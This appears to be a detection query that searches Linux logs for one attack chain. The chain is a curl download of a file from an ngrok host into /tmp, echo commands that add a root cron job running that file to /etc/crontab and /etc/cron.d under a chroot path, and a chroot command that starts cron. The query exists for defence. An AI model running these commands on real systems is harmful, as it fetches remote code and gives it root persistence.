linux 
| where (* contains 'curl --retry 3 -m 60 -o /tmp904c3/tmp/tmpfileb64ea3ba48a6a0abd0fe9d22511b77c6d \\\"http://04a4baaee996.ngrok.io/f/serve.1=d\\\\u0026r=64ea3ba48a6a0abd0fe9d22511b77c6d\\\"' 
    or * contains 'echo \\\".* .* .* .* .* root sh /tmp/tmpfileb64ea3ba48a6a0abd0fe9d22511b77c6d \\\" u00e3/tmpe904c3/etc/crontab' 
    or * contains 'echo \\\".* .* .* .* .* root sh /tmp/tmpfileb64ea3ba48a6a0abd0fe9d22511b77c6d \\\" u00e3/tmpe904c3/etc/cron.d/lm' 
    or * contains 'chroot /tmpe904c3 sh -c \\\"cron || crond \\\"')    